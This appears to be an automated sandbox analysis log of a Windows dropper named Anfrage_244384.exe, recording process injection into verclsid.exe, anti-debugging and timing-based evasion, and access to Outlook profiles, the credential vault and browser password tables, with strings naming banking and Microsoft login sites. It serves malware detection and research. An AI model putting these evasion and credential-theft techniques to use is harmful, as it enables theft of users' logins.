Code function: 0_2_004043E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004043E6

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,

0_2_004020CD

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Users\user\AppData\Roaming\secretaryships

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Users\user\AppData\Local\Temp\nsgA5D8.tmp

Jump to behavior

Source: Anfrage_244384.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: verclsid.exe, 00000007.00000003.3288960229.0000000000855000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3361368137.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3288960229.0000000000876000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3361368137.0000000000876000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3291082475.0000000000881000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File read: C:\Users\user\Desktop\Anfrage_244384.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: oleacc.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: shfolder.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: riched20.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: usp10.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: msls31.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: powrprof.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: umpdc.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: winsqlite3.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: rasadhlp.dll			Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\verclsid.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Anfrage_244384.exe

Static file information: File size 1240824 > 1048576

Source: Anfrage_244384.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dptLotHBnXg.exe, 00000006.00000000.3013372549.00000000009CE000.00000002.00000001.01000000.00000009.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174453120.00000000009CE000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Anfrage_244384.exe, Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: verclsid.pdbGCTL source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: verclsid.pdb source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match

File source: 00000000.00000002.2597198603.0000000004A03000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_10002D20 push eax; ret		0_2_10002D4E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346427FA pushad ; ret		4_2_346427F9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3464225F pushad ; ret		4_2_346427F9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3464283D push eax; iretd		4_2_34642858
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346709AD push ecx; mov dword ptr [esp], ecx		4_2_346709B6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045909AD push ecx; mov dword ptr [esp], ecx		7_2_045909B6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C0B37 push ds; iretd		7_2_003C0B40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CEC80 push edx; retn 134Bh		7_2_003CED83
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C4FF9 push 00000065h; retf		7_2_003C500E
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C7306 pushad ; ret		7_2_003C7304
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C74CD push esp; retf		7_2_003C74D1
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CBFC7 push eax; iretd		7_2_003CBFCC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5491 push ds; retf		7_2_048B549F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B659E push 00000051h; iretd		7_2_048B65B2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5564 push eax; retf		7_2_048B5566
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC6E5 push ecx; iretd		7_2_048BC6AD
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC60A push ecx; iretd		7_2_048BC6AD
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC67D push ecx; iretd		7_2_048BC6AD
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B47B3 push edi; ret		7_2_048B47BA
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BD02C push FFFFFFF7h; ret		7_2_048BD02F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BB2A4 pushfd ; ret		7_2_048BB305
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B6258 push esp; ret		7_2_048B6259
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B737C pushfd ; iretd		7_2_048B73BC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BBD56 pushfd ; retf		7_2_048BBD57
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5E2D push ecx; retf		7_2_048B5E39
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5E46 push ebp; ret		7_2_048B5E61
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC813 pushfd ; ret		7_2_048BC814
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC869 push edi; iretd		7_2_048BC86A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B596F push 0000002Ch; ret		7_2_048B5978
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B0BAE push edx; iretd		7_2_048B0BBD
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B0BBE push FFFFFFFDh; iretd		7_2_048B0BC0

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Anfrage_244384.exe	API/Special instruction interceptor: Address: 4D102F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	API/Special instruction interceptor: Address: 38D02F6
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Users\user\Desktop\Anfrage_244384.exe	RDTSC instruction interceptor: First address: 4CD3731 second address: 4CD3731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1534B1992Bh 0x00000004 test bh, ah 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F1534B19905h 0x0000000a test dl, bl 0x0000000c inc ebp 0x0000000d test edx, 1E38E0C7h 0x00000013 inc ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Anfrage_244384.exe	RDTSC instruction interceptor: First address: 3893731 second address: 3893731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15350784ABh 0x00000004 test bh, ah 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F1535078485h 0x0000000a test dl, bl 0x0000000c inc ebp 0x0000000d test edx, 1E38E0C7h 0x00000013 inc ebx 0x00000014 rdtsc

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 4_2_347416A6 rdtsc

4_2_347416A6

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Anfrage_244384.exe	API coverage: 0.2 %
Source: C:\Windows\SysWOW64\verclsid.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\verclsid.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_00405665
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_0040270B FindFirstFileA,		0_2_0040270B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_004060C7 FindFirstFileA,FindClose,		0_2_004060C7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CC460 FindFirstFileW,FindNextFileW,FindClose,		7_2_003CC460

Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 02-E8420l.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 02-E8420l.7.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: merica.comVMware20,11696487552|UE
Source: 02-E8420l.7.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 02-E8420l.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Anfrage_244384.exe, 00000004.00000003.2993262650.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2992975055.00000000043CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 02-E8420l.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 02-E8420l.7.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552u
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8J=
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,116
Source: 02-E8420l.7.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000805000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362395237.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 02-E8420l.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 02-E8420l.7.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 02-E8420l.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 02-E8420l.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,1169648E
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ebrokers.co.inVMware20,11696487552d
Source: 02-E8420l.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 02-E8420l.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 02-E8420l.7.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 02-E8420l.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CDYNVMware20,116,)
Source: 02-E8420l.7.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 02-E8420l.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 02-E8420l.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 02-E8420l.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Anfrage_244384.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Anfrage_244384.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\verclsid.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\verclsid.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 4_2_347416A6 rdtsc

4_2_347416A6

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 4_2_346B35C0 NtCreateMutant,LdrInitializeThunk,

4_2_346B35C0

Source: C:\Users\user\Desktop\Anfrage_244384.exe

